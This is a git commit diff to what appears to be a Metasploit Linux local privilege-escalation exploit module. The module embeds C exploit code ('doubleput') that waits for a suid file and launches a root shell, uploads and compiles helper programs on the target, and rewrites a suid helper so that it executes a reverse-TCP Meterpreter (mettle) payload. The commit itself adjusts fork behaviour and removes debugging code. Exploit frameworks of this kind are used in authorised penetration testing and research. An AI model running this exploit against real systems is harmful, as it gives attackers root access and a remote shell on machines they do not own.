prepend fork fix
h00die
parent
75bea08e0e
commit
2c4a069e32
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/local/linux_kernel'
|
||||
require 'msf/core/exploit/local/linux'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = GoodRanking
|
||||
|
|
@ -13,7 +11,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
include Msf::Exploit::EXE
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::Local::Linux
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info, {
|
||||
|
|
@ -47,6 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'DefaultOptions' =>
|
||||
{
|
||||
'payload' => 'linux/x64/mettle/reverse_tcp',
|
||||
'PrependFork' => true,
|
||||
'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through
|
||||
},
|
||||
'DefaultTarget' => 1,
|
||||
|
|
@ -134,20 +132,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
register_file_for_cleanup(file_path)
|
||||
end
|
||||
|
||||
doubleput_sc = Metasm::ELF.new(@cpu)
|
||||
#@include_search_path = ['/usr/include/c++/6']
|
||||
#@@include_search_path = ['/usr/include/c++/6']
|
||||
#include_search_path = ['/usr/include/c++/6']
|
||||
#doubleput_sc.parse %Q|
|
||||
# #define DEBUGGING
|
||||
# #define NULL ((void*)0)
|
||||
# #ifdef __ELF__
|
||||
# .section ".bss" rwx
|
||||
# .section ".text" rwx
|
||||
# .entrypoint
|
||||
# #endif
|
||||
#|
|
||||
|
||||
doubleput = %q{
|
||||
#define _GNU_SOURCE
|
||||
#include <stdbool.h>
|
||||
|
|
@ -288,33 +272,11 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
sleep(1);
|
||||
}
|
||||
fputs("suid file detected, launching rootshell...\n", stderr);
|
||||
#execl("./suidhelper", "suidhelper", NULL);
|
||||
exit(0);
|
||||
execl("./suidhelper", "suidhelper", NULL);
|
||||
err(1, "execl suidhelper");
|
||||
}
|
||||
}
|
||||
|
||||
cparser.parse(doubleput, 'doubleput.c', path = '/usr/include/c++/6')
|
||||
# This will give you all the structs and #defines (from all included
|
||||
# headers) that are actually used by our C code so we can avoid
|
||||
# needing them at runtime.
|
||||
puts cparser.factorize
|
||||
|
||||
asm = cpu.new_ccompiler(cparser, doubleput_sc).compile
|
||||
doubleput_sc.parse asm
|
||||
doubleput_sc.assemble
|
||||
|
||||
begin
|
||||
elf = doubleput_sc.encode_string
|
||||
rescue
|
||||
print_error "Metasm Encoding failed: #{$!}"
|
||||
elog "Metasm Encoding failed: #{$!.class} : #{$!}"
|
||||
elog "Call stack:\n#{$!.backtrace.join("\n")}"
|
||||
return
|
||||
end
|
||||
return
|
||||
|
||||
|
||||
suid_helper = %q{
|
||||
#include <unistd.h>
|
||||
#include <err.h>
|
||||
|
|
@ -501,8 +463,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
# make our substitutions so things are dynamic
|
||||
suid_helper.gsub!(/execl\("\/bin\/bash", "bash", NULL\);/,
|
||||
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
|
||||
#doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/,
|
||||
# 'exit(0);')
|
||||
doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/,
|
||||
'exit(0);')
|
||||
print_status('Writing files to target')
|
||||
cmd_exec("cd #{datastore['WritableDir']}")
|
||||
upload_and_compile('hello', hello_path, hello, compile ? "gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`" : nil)
|
||||
|
|
|
|||
Loading…
Reference in New Issue